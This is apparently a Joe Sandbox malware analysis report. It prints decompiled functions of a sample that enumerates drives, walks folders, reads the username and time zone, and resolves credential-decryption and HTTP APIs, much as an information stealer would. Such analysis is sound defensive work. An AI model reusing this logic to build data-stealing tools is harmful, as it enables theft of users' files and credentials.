Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 004093FB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 00409402
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 00409411
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 0040941B

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$lstrcpyn$Alloclstrlen$ByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 1885324996-0
Opcode ID: aab11f175c4dcfd9692ea14cd4bfaae73fa907070145325f273cc474fc5e9468
Instruction ID: bf3e6bb46204bb3e37d09e038ca25be6bf8868f14e997d98ff16e67e74bb5e03
Opcode Fuzzy Hash: aab11f175c4dcfd9692ea14cd4bfaae73fa907070145325f273cc474fc5e9468
Instruction Fuzzy Hash: 0D4192B1A002149FDB04CF69DDC496ABBF8EB48320B14857AFE09FB355D6749D50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABD8 Relevance: 10.7, APIs: 7, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0040ABD8(intOrPtr __ecx, short __edx) {
				intOrPtr _v20;
				short _v24;
				short _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				WCHAR* _v48;
				char _v52;
				long _v56;
				void* _v60;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v108;
				void* _v112;
				short* _v136;
				WCHAR* _v140;
				char _v152;
				intOrPtr _v156;
				void* _t44;
				long _t47;
				signed int _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				char _t55;
				intOrPtr _t57;
				intOrPtr* _t69;
				void* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t87;
				WCHAR* _t94;
				void* _t98;
				long _t102;
				void* _t105;
				WCHAR* _t107;
				void* _t110;
				short* _t111;
				void* _t112;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int _t120;
				void* _t123;

				_v44 = 0;
				_v24 = __edx;
				_v20 = __ecx;
				_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000, _t105, _t112, _t77);
				_t44 = E0040AE06(0, _t78,  &_v52, __ecx, 0, 0, __edx, 0); // executed
				_t123 = (_t120 & 0xfffffff8) - 0x2c + 0x14;
				if(_t44 >= 0) {
					_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
					_v48 = _t107;
					_t47 = GetLogicalDriveStringsW(0x208, _t107); // executed
					_v56 = _t47;
					if(_t47 == 0) {
						L10:
						if(_v60 > 0) {
							_t51 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t98 = 0x10;
							_t53 = E0040A05F(_t51, _t98);
							_v52 = _t53;
							_t54 =  *((intOrPtr*)( *0x40e13c))(_t52,  *0x40e210);
							_t110 = _v60;
							_t55 = E0040A503(_t54, _t110);
							_t87 =  *0x40e204; // 0x5f5980
							_v72 = _t55;
							_v80 = _t87;
							_v76 = 0;
							_t57 = E00408619( &_v72);
							_v68 = _t57;
							_t118 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, 0, 0, 0, 0);
							if(0 != 0) {
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, _t118, 0, 0, 0);
								if(0 != 0) {
									E00407EDB(_v136, _t118, 0, 0, _v156, _t78, _v140,  &_v152);
								}
							}
							LocalFree(_t118);
							LocalFree(_v108);
							LocalFree(_v112);
							LocalFree(_t110);
						}
						_t115 = 1;
						L16:
						LocalFree(_t78);
						_t49 = _t115;
						L17:
						return _t49;
					}
					_t119 = 0;
					if(_t47 == 0) {
						goto L10;
					}
					_t94 = _v48;
					_t111 =  &(_t107[0xfffffffffffffffe]);
					_t102 = _v56;
					_t69 = _t94 - 6;
					_v44 = _t69;
					do {
						if(_t119 <= 0) {
							goto L9;
						}
						_t102 = _v56;
						if(_t94[_t119] != 0) {
							goto L9;
						}
						_v32 =  *_t69;
						_v30 =  *_t111;
						_v28 = 0;
						_v24 = 0;
						_t74 = E0040AE06( &_v32, _t78,  &_v60, _v36,  &_v32, _t73, _v40, 0); // executed
						_t123 = _t123 + 0x14;
						if(_t74 < 0) {
							_t115 = _t119 | 0xffffffff;
							goto L16;
						}
						_t119 = _t119 + 1;
						_t94 = _v48;
						_t69 = _v44 + 2;
						_t102 = _v56;
						_t111 =  &(_t111[1]);
						L9:
						_t119 = _t119 + 3;
						_t69 = _t69 + 6;
						_t111 =  &(_t111[3]);
						_v44 = _t69;
					} while (_t119 < _t102);
					goto L10;
				}
				_t49 = LocalFree(_t78) | 0xffffffff;
				goto L17;
			}

0x0040abef
0x0040abfa
0x0040abfe
0x0040ac04
0x0040ac13
0x0040ac18
0x0040ac1d
0x0040ac42
0x0040ac4a
0x0040ac4e
0x0040ac50
0x0040ac56
0x0040acee
0x0040acf3
0x0040ad05
0x0040ad16
0x0040ad1a
0x0040ad1f
0x0040ad31
0x0040ad35
0x0040ad37
0x0040ad3f
0x0040ad44
0x0040ad4a
0x0040ad50
0x0040ad58
0x0040ad5c
0x0040ad6e
0x0040ad7a
0x0040ad8b
0x0040ad8f
0x0040ada6
0x0040adaa
0x0040adc4
0x0040adc9
0x0040adaa
0x0040adcd
0x0040add7
0x0040ade1
0x0040ade8
0x0040ade8
0x0040adf0
0x0040adf1
0x0040adf2
0x0040adf8
0x0040adfa
0x0040ae00
0x0040ae00
0x0040ac5e
0x0040ac62
0x00000000
0x00000000
0x0040ac68
0x0040ac6c
0x0040ac6f
0x0040ac73
0x0040ac76
0x0040ac7a
0x0040ac7c
0x00000000
0x00000000
0x0040ac84
0x0040ac88
0x00000000
0x00000000
0x0040ac91
0x0040ac9b
0x0040aca7
0x0040acab
0x0040acba
0x0040acbf
0x0040acc4
0x0040ae01
0x00000000
0x0040ae01
0x0040acce
0x0040accf
0x0040acd3
0x0040acd6
0x0040acda
0x0040acdd
0x0040acdd
0x0040ace0
0x0040ace3
0x0040ace6
0x0040acea
0x00000000
0x0040ac7a
0x0040ac26
0x00000000

APIs

LocalFree.KERNEL32(00000000), ref: 0040AC20
GetLogicalDriveStringsW.KERNEL32(00000208,00000000), ref: 0040AC4E

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: DriveFreeLocalLogicalStrings
String ID:
API String ID: 1768043713-0
Opcode ID: dc7ccc39edee971ab1b236b441a52c5b138dab3c72356f1cfc7a843f9bc822a2
Instruction ID: 0df1316ab9a5c1427916cb56fbbb1f674cf856c690d2ecf6bb3ed985b7a3ed22
Opcode Fuzzy Hash: dc7ccc39edee971ab1b236b441a52c5b138dab3c72356f1cfc7a843f9bc822a2
Instruction Fuzzy Hash: AF517EB1604311AFE304DB26DD44A2B76E9EBC8714F004A2EF959E72D0DA749D118BAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 9.1, APIs: 6, Instructions: 130
fileCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E0040196E(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				struct _WIN32_FIND_DATAW _v608;
				char _v1126;
				short _v1128;
				void* __ebx;
				void* __esi;
				void* _t33;
				int _t34;
				void* _t39;
				signed int _t41;
				void* _t62;
				WCHAR* _t83;
				intOrPtr _t84;
				WCHAR* _t85;
				void* _t86;

				_t84 = __edx;
				_v12 = __edx;
				_t83 = __ecx;
				if(_a12 > 2) {
					L11:
					return 1;
				}
				_push(__ecx);
				E004018E9( &_v1128, 0x104, __ecx, __ecx);
				E0040188C(0x104,  &_v1128, 0x104, __edx,  *0x40e1d0);
				_t33 = FindFirstFileW( &_v1128,  &_v608); // executed
				_t62 = _t33;
				if(_t62 != 0xffffffff) {
					do {
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L9;
						}
						_push( *0x40e1dc);
						_push( &(_v608.cFileName));
						if( *((intOrPtr*)( *0x40e0a0))() != 0) {
							_push( *0x40e1ac);
							_push( &(_v608.cFileName));
							if( *((intOrPtr*)( *0x40e18c))() == 0) {
								L16:
								_t39 = 0x2e;
								if(_t39 != _v608.cFileName) {
									_t41 =  *((intOrPtr*)( *0x40e08c))(_t83);
									_t72 =  &_v1126 + _t41 * 2;
									_push( &_v1126 + _t41 * 2);
									E004018E9( &_v1126 + _t41 * 2, 0x104, _t72,  &(_v608.cFileName));
									E0040196E( &_v1128, _t84, _a4, _a8, _a12 + 1); // executed
									_t86 = _t86 + 0xc;
								}
								goto L9;
							}
							_push( *0x40e1cc);
							_push( &(_v608.cFileName));
							if( *((intOrPtr*)( *0x40e18c))() == 0) {
								goto L16;
							}
							_t85 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							PathCombineW(_t85, _t83,  &(_v608.cFileName));
							_push(1);
							L6:
							_push(_a8);
							_push(_a4);
							E00401E18(_t85, _v12);
							_t86 = _t86 + 0xc;
							if(_t85 != 0) {
								LocalFree(_t85);
							}
							_t84 = _v12;
							goto L9;
						}
						_t85 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
						PathCombineW(_t85, _t83,  &(_v608.cFileName));
						_push(0);
						goto L6;
						L9:
						_t34 = FindNextFileW(_t62,  &_v608); // executed
					} while (_t34 != 0);
					FindClose(_t62); // executed
					goto L11;
				}
				return 0;
			}

0x0040197d
0x00401980
0x00401983
0x00401985
0x00401a54
0x00000000
0x00401a54
0x0040198b
0x0040199b
0x004019ae
0x004019c6
0x004019c8
0x004019cd
0x004019d6
0x004019dd
0x00000000
0x00000000
0x004019df
0x004019f0
0x004019f5
0x00401a5b
0x00401a6c
0x00401a71
0x00401ab1
0x00401ab3
0x00401abb
0x00401ac7
0x00401ad4
0x00401ad7
0x00401ae0
0x00401af8
0x00401afd
0x00401afd
0x00000000
0x00401abb
0x00401a73
0x00401a84
0x00401a89
0x00000000
0x00000000
0x00401a99
0x00401aa4
0x00401aaa
0x00401a18
0x00401a18
0x00401a20
0x00401a23
0x00401a28
0x00401a2d
0x00401a30
0x00401a30
0x00401a36
0x00000000
0x00401a36
0x00401a05
0x00401a10
0x00401a16
0x00000000
0x00401a39
0x00401a47
0x00401a49
0x00401a4e
0x00000000
0x00401a4e
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004019C6
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401A10
LocalFree.KERNEL32(00000000), ref: 00401A30
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401A47
FindClose.KERNEL32(00000000), ref: 00401A4E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401AA4

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Find$CombineFilePath$CloseFirstFreeLocalNext
String ID:
API String ID: 1203334675-0
Opcode ID: 6a9ca44490c9a4a8961f3d1a0bee996609b7599d894a2e19d50e07a58da0faa2
Instruction ID: 3d68e71345cd2aefdee3dd56593ad5adbe6c8fe38e95c290ac396d302c259ee2
Opcode Fuzzy Hash: 6a9ca44490c9a4a8961f3d1a0bee996609b7599d894a2e19d50e07a58da0faa2
Instruction Fuzzy Hash: D2410571600214ABDB24EB55DD84FAB7378EB44300F00457AF905B32E0EB789E55CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040633E Relevance: 7.6, APIs: 5, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040633E(WCHAR* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				char _v536;
				char _v538;
				short _v540;
				char _v552;
				char _v1076;
				intOrPtr _v1084;
				struct _WIN32_FIND_DATAW _v1132;
				short* _v1148;
				void* __ebx;
				void* __esi;
				void* _t25;
				void* _t29;
				int _t31;
				void* _t34;
				signed int _t36;
				WCHAR* _t49;
				void* _t74;
				intOrPtr _t76;
				void* _t78;

				_t76 = _a8;
				_t49 = __ecx;
				_v1132.ftLastAccessTime.dwFileAttributes = __edx;
				if(_t76 > 2) {
					L10:
					_t25 = 1;
					L11:
					return _t25;
				}
				_push(__ecx);
				E004018E9( &_v524, 0x104, __ecx, __ecx);
				E0040188C(__ecx,  &_v536, 0x104, _t76,  *0x40e1d0);
				_t29 = FindFirstFileW( &_v540,  &_v1132); // executed
				_t74 = _t29;
				if(_t74 != 0xffffffff) {
					do {
						__eflags = _v1132.ftLastAccessTime.dwFileAttributes & 0x00000010;
						if((_v1132.ftLastAccessTime.dwFileAttributes & 0x00000010) != 0) {
							__eflags =  *((intOrPtr*)( *0x40e0a0))( &_v1076,  *0x40e394);
							if(__eflags != 0) {
								_t34 = 0x2e;
								__eflags = _t34 - _v1084;
								if(_t34 != _v1084) {
									_t36 =  *((intOrPtr*)( *0x40e08c))(_t49);
									_t59 =  &_v538 + _t36 * 2;
									_push( &_v538 + _t36 * 2);
									E004018E9( &_v538 + _t36 * 2, 0x104, _t59,  &(_v1132.cFileName));
									_t22 = _t76 + 1; // 0x407b87
									E0040633E( &_v552, _v1148, _a4, _t22); // executed
								}
							} else {
								_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								PathCombineW(_t78, _t49,  &(_v1132.dwReserved1));
								E00406725(_t78, _v1148, __eflags, _a4);
								__eflags = _t78;
								if(_t78 != 0) {
									LocalFree(_t78);
								}
								_t76 = _a8;
							}
						}
						_t31 = FindNextFileW(_t74,  &(_v1132.ftLastAccessTime)); // executed
						__eflags = _t31;
					} while (_t31 != 0);
					FindClose(_t74);
					goto L10;
				} else {
					_t25 = 0;
					goto L11;
				}
			}

0x0040634c
0x0040634f
0x00406351
0x00406359
0x00406417
0x00406417
0x00406419
0x0040641f
0x0040641f
0x0040635f
0x00406370
0x00406384
0x0040639b
0x0040639d
0x004063a2
0x004063a8
0x004063a8
0x004063ad
0x004063c1
0x004063c3
0x00406422
0x00406423
0x00406428
0x00406430
0x0040643e
0x00406441
0x00406448
0x00406451
0x0040645f
0x00406465
0x004063c5
0x004063d3
0x004063dc
0x004063eb
0x004063f1
0x004063f3
0x004063f6
0x004063f6
0x004063fc
0x004063fc
0x004063c3
0x0040640a
0x0040640c
0x0040640c
0x00406411
0x00000000
0x004063a4
0x004063a4
0x00000000
0x004063a4

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040639B
PathCombineW.SHLWAPI(00000000,?,?), ref: 004063DC
LocalFree.KERNEL32(00000000), ref: 004063F6
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0040640A
FindClose.KERNEL32(00000000), ref: 00406411

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Find$File$CloseCombineFirstFreeLocalNextPath
String ID:
API String ID: 3818457336-0
Opcode ID: eaed1e93e5892b48d27f800aebad6855d1cc82eb2c9bf3f724fc16a94e156a62
Instruction ID: a2e91296d065ef1b0a06dad1807512ccc5f2754619bc6de4979fdad6ab57a53e
Opcode Fuzzy Hash: eaed1e93e5892b48d27f800aebad6855d1cc82eb2c9bf3f724fc16a94e156a62
Instruction Fuzzy Hash: CE310272104316ABD714EB54DC80DBB73A8EB84314F00493EFD56A32E0DB79A919DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040919C Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040919C(intOrPtr* _a4) {
				struct _TIME_ZONE_INFORMATION _v176;
				void* _t8;
				void* _t20;
				intOrPtr* _t21;

				GetTimeZoneInformation( &_v176); // executed
				_t20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_push( ~(_v176.Bias));
				_t8 = 0x2b;
				_t15 =  >  ? _t8 : 0;
				wsprintfW(_t20,  *0x40e2f4,  >  ? _t8 : 0);
				_t21 = _a4;
				 *_t21 = E0040A503( *_t21, _t20);
				LocalFree(_t20);
				return 1;
			}

0x004091ae
0x004091cc
0x004091ce
0x004091d1
0x004091d4
0x004091df
0x004091e5
0x004091f5
0x004091f7
0x00409203

APIs

GetTimeZoneInformation.KERNEL32(?,-00000014,74CB5850), ref: 004091AE
wsprintfW.USER32 ref: 004091DF

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 004091F7

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocallstrlen$AllocGlobalInformationTimeZonewsprintf
String ID:
API String ID: 3282131229-0
Opcode ID: d592d6c3996a648defe8ffdc820656a88c2c7fffa4bf62a580ebbbc8acde2add
Instruction ID: 22640a5e82af922e2c0672ad49884a71deb67002d2383c126f26ce4509f9bf47
Opcode Fuzzy Hash: d592d6c3996a648defe8ffdc820656a88c2c7fffa4bf62a580ebbbc8acde2add
Instruction Fuzzy Hash: 2FF096B1700210AFF714AB6AED05F6BB7F9EFC9710F008839FA46E7150D6B499118A69

Uniqueness

Uniqueness Score: -1.00%

Function 0208092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 020809DC, 020809DF, 020809E4
l, xrefs: 02080966
., xrefs: 0208095F

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 761247b40084aa777b878560d26c120f0ea522af0afc58718300f8bafaa69f72
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F5313BB6910709DFDB11DF99C880AAEBBF6FF48324F15405AD881A7310D771EA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A672 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A672(void* __ecx) {
				long _v8;
				void* _t9;
				WCHAR* _t10;

				_v8 = 0x101;
				_t10 =  *((intOrPtr*)( *0x40e044))(0x40, 0x202, _t9, __ecx);
				GetUserNameW(_t10,  &_v8); // executed
				return _t10;
			}

0x0040a683
0x0040a68c
0x0040a693
0x0040a69d

APIs

GetUserNameW.ADVAPI32(00000000,00000101), ref: 0040A693

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d1904d6b7f39e67c7bb99d3a0e0e7b9e3097bfc240a7c331603b2b932608badc
Instruction ID: 829893f7f7874bcec709fc38dd40a9501cb2b48959beeca35c44734de89a3163
Opcode Fuzzy Hash: d1904d6b7f39e67c7bb99d3a0e0e7b9e3097bfc240a7c331603b2b932608badc
Instruction Fuzzy Hash: 13D05EB2200224BBD70097999E09ECAB6ACDB09750F000161BB15E7281D6B49E0087E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040100B Relevance: 222.8, APIs: 18, Strings: 109, Instructions: 531
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,?,00407780), ref: 00401042
LoadLibraryW.KERNEL32(Ole32.dll,?,?,?,?,?,00407780), ref: 00401051
LoadLibraryW.KERNEL32(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
LoadLibraryW.KERNEL32(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
LoadLibraryW.KERNEL32(Shell32.dll,?,?,?,?,?,00407780), ref: 004010A1
LoadLibraryW.KERNEL32(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
GetProcAddress.KERNEL32(?,HeapFree), ref: 00401297
GetProcAddress.KERNEL32(?,Sleep), ref: 00401369
GetProcAddress.KERNEL32(00000000,StrToIntA), ref: 004014CB
GetProcAddress.KERNEL32(00000000,StrToInt64ExW), ref: 004014E9
GetProcAddress.KERNEL32(?,CharUpperW), ref: 004015C1
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004016F6
GetProcAddress.KERNEL32(?,InternetReadFileExW), ref: 00401714
GetProcAddress.KERNEL32(?,HttpQueryInfoA), ref: 00401768
GetProcAddress.KERNEL32(?,HttpQueryInfoW), ref: 00401774

Strings

InternetConnectW, xrefs: 004016B5
CreateMutexW, xrefs: 004011FC
InternetCloseHandle, xrefs: 00401727
PathCombineW, xrefs: 00401454
GetEnvironmentVariableW, xrefs: 004010CA
GlobalMemoryStatusEx, xrefs: 004011C6
HttpOpenRequestW, xrefs: 00401739
SetCurrentDirectoryW, xrefs: 0040133A
FindNextFileW, xrefs: 00401272
FreeLibrary, xrefs: 00401232
GetSystemInfo, xrefs: 00401152
ReadFile, xrefs: 00401304
lstrlenA, xrefs: 004013C4
lstrcmpA, xrefs: 004013A0
SHGetFolderPathW, xrefs: 0040141E
DuplicateTokenEx, xrefs: 00401511
wsprintfW, xrefs: 0040162E
Ole32.dll, xrefs: 0040104C
InternetSetOptionW, xrefs: 004016D9
FindClose, xrefs: 00401244
CoCreateInstance, xrefs: 00401655
SystemFunction036, xrefs: 004015A1
WideCharToMultiByte, xrefs: 004013FA
StrStrW, xrefs: 0040149C
CloseHandle, xrefs: 004011D8
StrStrIW, xrefs: 004014B8
GetClientRect, xrefs: 004015DE
LocalFree, xrefs: 004012CE
SetEnvironmentVariableW, xrefs: 0040134C
InternetOpenW, xrefs: 004016C7
lstrcmpW, xrefs: 004013B2
CreateToolhelp32Snapshot, xrefs: 0040127A
StrRChrW, xrefs: 00401466
RegCloseKey, xrefs: 00401559
GetDriveTypeW, xrefs: 004010EE
CopyFileW, xrefs: 0040120E
CryptBinaryToStringW, xrefs: 0040168E
GetUserDefaultLCID, xrefs: 0040116C
RegOpenKeyExW, xrefs: 0040157D
InternetReadFile, xrefs: 0040171F
WriteFile, xrefs: 004013E8
InternetOpenUrlW, xrefs: 00401701
Advapi32.dll, xrefs: 00401069
lstrcpyA, xrefs: 00401374
Shell32.dll, xrefs: 00401099
CreateFileW, xrefs: 004011EA
ConvertSidToStringSidW, xrefs: 004014F7
Process32Next, xrefs: 00401328
HeapFree, xrefs: 0040128C
CreateProcessWithTokenW, xrefs: 004014FF
Bcrypt.dll, xrefs: 004010A3
CharUpperW, xrefs: 004015B6
lstrlenW, xrefs: 004013D6
User32.dll, xrefs: 00401079
LoadLibraryW, xrefs: 00401030
kernel32.dll, xrefs: 00401011
DeleteFileW, xrefs: 00401220
InternetOpenUrlA, xrefs: 004016EB
MultiByteToWideChar, xrefs: 004012F2
lstrcpynA, xrefs: 0040137C
GetTokenInformation, xrefs: 00401523
OpenProcessToken, xrefs: 00401547
GetLogicalDriveStringsW, xrefs: 00401124
StrToIntW, xrefs: 004014D6
lstrcmpiW, xrefs: 00401398
StrToInt64ExW, xrefs: 004014DE
Sleep, xrefs: 0040135E
GetLocaleInfoW, xrefs: 00401112
GetLastError, xrefs: 00401100
CryptUnprotectData, xrefs: 004016A0
Process32First, xrefs: 00401316
OpenMutexW, xrefs: 004012AA
GetSystemWow64DirectoryW, xrefs: 0040115A
GetSystemMetrics, xrefs: 0040160A
GetUserDefaultLocaleName, xrefs: 0040117E
RegQueryValueExW, xrefs: 0040158F
RegEnumKeyExW, xrefs: 0040156B
CoInitialize, xrefs: 00401643
HttpQueryInfoA, xrefs: 0040175D
LocalAlloc, xrefs: 004012E0
ReleaseDC, xrefs: 0040161C
GetDC, xrefs: 004015E6
StrCpyW, xrefs: 00401478
GetProcAddress, xrefs: 004010B0
OpenProcess, xrefs: 004012BC
GetTimeZoneInformation, xrefs: 00401190
PathMatchSpecW, xrefs: 00401442
Shlwapi.dll, xrefs: 00401038
InternetReadFileExW, xrefs: 00401709
FindFirstFileW, xrefs: 00401256
ExitProcess, xrefs: 004012A2
GetFileSize, xrefs: 004010DC
EnumDisplayDevicesW, xrefs: 004015CC
CryptStringToBinaryA, xrefs: 0040166A
ShellExecuteW, xrefs: 0040140C
HttpQueryInfoW, xrefs: 0040176E
Crypt32.dll, xrefs: 00401089
GetUserNameW, xrefs: 00401535
GetDesktopWindow, xrefs: 004015F8
WinInet.dll, xrefs: 00401059
GetModuleFileNameW, xrefs: 00401136
GetCurrentProcess, xrefs: 004010BD
GlobalAlloc, xrefs: 004011A2
GlobalFree, xrefs: 004011B4
StrToIntA, xrefs: 004014C0
CryptStringToBinaryW, xrefs: 0040167C
SHGetSpecialFolderPathW, xrefs: 00401430
StrStrA, xrefs: 0040148A
HttpSendRequestW, xrefs: 0040174B

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32Next$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrc